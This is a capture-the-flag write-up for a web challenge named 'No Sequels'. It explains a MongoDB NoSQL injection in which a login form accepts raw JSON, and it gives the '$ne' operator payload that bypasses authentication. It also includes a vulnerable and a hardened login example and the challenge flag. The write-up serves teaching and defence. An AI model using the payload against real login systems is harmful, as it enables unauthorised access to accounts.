No Sequels

Category: Web
Points: 50
Description: The prequels sucked, and the sequels aren’t much better, but at least we always have the original trilogy.

This one I found really interesting because I had never done NoSQL injection before. Anyway, we are presented with a stock-standard username/password form and the source code showing how we are authenticated.

The server checks the values we give it to see if they authenticate us. But because the JSON input is passed through unsanitised, we can inject our own operators into the query.

So our input is stored like this:

var query = {
    username: user,   // taken straight from the request body
    password: pass    // likewise, no type check
};
db.collection('users').findOne(query, function (err, user) {
    ...
});

And queried like that. So we can manipulate the user value so that it is not a literal value but a sub-query in itself, by supplying a JSON object containing the $ne operator. We want the query to end up as

var query = {
    username: {"$ne": 1},
    password: {"$ne": 1}
};

Since {"$ne": 1} matches any username or password that is not equal to 1, every user document satisfies the criteria, and findOne returns the first one in the collection.

To send this request I captured it in Burp, changed the ‘Content-Type’ header to ‘application/json’ and sent the following payload:

{
    "username": {"$ne": 1},
    "password": {"$ne": 1}
}

This logs you into the system and you get the flag!
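To make the mechanism concrete, here is an added example (not code from the challenge or the original post) with a tiny in-memory stand-in for findOne() that understands equality and $ne, the vulnerable login that passes the decoded body straight through, and a hardened version that only accepts string credentials. The user documents are constructed sample data.

```javascript
// Constructed sample collection standing in for db.collection('users').
const users = [
  { username: 'admin', password: 'hunter2' },
  { username: 'alice', password: 'wonderland' },
];

// Match one stored field against a query value: either direct equality or an
// operator object such as {"$ne": 1}. Only $ne is emulated here.
function fieldMatches(stored, wanted) {
  if (wanted !== null && typeof wanted === 'object') {
    if ('$ne' in wanted) return stored !== wanted.$ne;
    return false; // other operators are not modelled in this example
  }
  return stored === wanted;
}

// Emulates findOne(query): the first document where every queried field matches.
function findOne(query) {
  return users.find((doc) =>
    Object.keys(query).every((k) => fieldMatches(doc[k], query[k]))) || null;
}

// Vulnerable: the decoded JSON body is dropped straight into the query, so an
// object value is interpreted as a MongoDB operator instead of a literal string.
function vulnerableLogin(body) {
  return findOne({ username: body.username, password: body.password });
}

// Hardened: credentials must be primitive strings. Objects, arrays, numbers or
// missing fields are rejected before they ever reach the query.
function hardenedLogin(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return null; // failed login; a real app would also log this for detection
  }
  return findOne({ username, password });
}
```

The same type check can be applied generically to any request field that is used as a query value; using a schema validator that forbids $-prefixed keys achieves the same effect.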

FLAG:

actf{no_sql_doesn't_mean_no_vuln}
